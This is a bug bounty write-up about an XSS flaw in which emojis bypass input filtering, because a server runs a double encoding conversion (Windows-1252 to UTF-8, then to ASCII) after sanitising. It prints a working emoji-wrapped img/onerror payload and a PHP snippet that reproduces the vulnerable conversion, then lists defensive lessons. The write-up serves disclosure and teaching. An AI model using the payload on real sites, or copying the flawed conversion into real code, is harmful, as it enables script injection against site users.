When emojis cause XSS

When emojis cause XSS

2025-09-21

Vulnerability description

During a bug bounty investigation, we discovered an XSS vulnerability that, surprisingly, could be exploited using emojis. The input parameters seemed secure at first glance: the system removed most malicious characters, so the vulnerability was not obvious.

We were inspired by a technique shared in the community that was based on Unicode characters. We retested the domain, and although the method did not work directly, we got unexpected results when trying out some emojis: special quotation marks and apostrophes appeared in the response. For example, one string looked like this: d"Y’".

Using an open source emoji database, we discovered that certain emojis can result in characters that are converted into HTML opening and closing tags during processing. This is how the working payload was created:

💋img src=x onerror=alert(document.domain)//💛

Why did it work?

We created a simple test page to better understand the process going on in the background. It turned out that after removing the malicious characters, the server performed an incorrect encoding conversion. It first considered the input to be encoded in Windows-1252, then converted it to UTF-8, even though it was already UTF-8. This did not produce a real < character, but a strange Unicode character: .

The system then performed another conversion, from UTF-8 to ASCII. During the second conversion, the character became an actual <, and this is exactly what opened the door to the exploit.

A simple PHP example used for reproduction from the test environment:

<?php

$str = isset($_GET["str"]) ? htmlspecialchars($_GET["str"]) : "";

$str = iconv('Windows-1252', "UTF-8", $str);
$str = iconv('UTF-8', "ASCII//TRANSLIT", $str);

echo "String: " . $str;

Lessons learned

  • A chain of encoding conversions and normalizations can easily lead to unexpected character transformations that bypass input filtering
  • An emoji or other Unicode character can also generate a byte sequence that becomes a special HTML character during processing
  • Consistent input encoding and consistent normalization checks are required throughout the entire processing chain.
  • Output escaping must always be adapted to the specific context.

This case highlights that security issues do not always stem from classic errors; sometimes a single emoji can be enough for a successful XSS attack.

Sources

Abusing unicode characters to PWN Intigriti XSS challenge

Unicode representations of emoji characters



The website has a static structure and does not use its own cookies. However, Google Analytics and Google Ads may use cookies, which may be activated automatically when you visit the site.
Hungarian website